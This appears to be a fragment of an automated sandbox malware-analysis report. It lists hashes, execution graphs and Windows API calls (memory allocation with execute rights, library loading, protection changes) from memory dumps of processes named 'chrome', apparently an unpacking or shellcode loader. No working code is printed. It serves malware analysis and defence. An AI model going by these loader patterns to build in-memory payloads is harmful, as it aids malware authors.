                                                    • String ID:
                                                    • API String ID: 375261010-0
                                                    • Opcode ID: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction ID: de1865b19889e4c34f3901d772de5420566288a5fdeff7b2775c1956b6ec4773
                                                    • Opcode Fuzzy Hash: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction Fuzzy Hash: 5681D375A0060AAFDB40CF9CC984A9EB7F5FF48314B1582A1E948EB362D730ED51CB94

                                                    Execution Graph

                                                    Execution Coverage:41.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:6
                                                    Total number of Limit Nodes:0
                                                    execution_graph 86 d20000 VirtualAlloc 88 d2003e 86->88 87 d200d4 LoadLibraryA 87->88 88->87 90 d2014a 88->90 89 d201fe KiUserExceptionDispatcher 90->89 91 d201e7 VirtualProtect 90->91 91->89 91->90

                                                    Callgraph

                                                    Control-flow Graph

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00D20035
                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 00D200E0
                                                    • VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 00D201F5
                                                    • KiUserExceptionDispatcher.NTDLL(00000000,00000001,00000000), ref: 00D20215
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1787170547.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_d20000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocDispatcherExceptionLibraryLoadProtectUser
                                                    • String ID:
                                                    • API String ID: 375261010-0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1811922332.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_53a0000_chrome.jbxd

                                                    Execution Graph

                                                    Execution Coverage:53.6%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:7
                                                    Total number of Limit Nodes:0
                                                    execution_graph 78 d20000 VirtualAlloc 79 d2003e VirtualAlloc 78->79 81 d20056 78->81 79->81 80 d200d4 LoadLibraryA 80->81 81->80 83 d2014a 81->83 82 d201fe 83->82 84 d201e7 VirtualProtect 83->84 84->82 84->83

                                                    Callgraph

                                                    Control-flow Graph

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00D20035
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00D20051
                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 00D200E0
                                                    • VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 00D201F5
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.4125887271.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_d20000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Alloc$LibraryLoadProtect
                                                    • String ID:
                                                    • API String ID: 515352489-0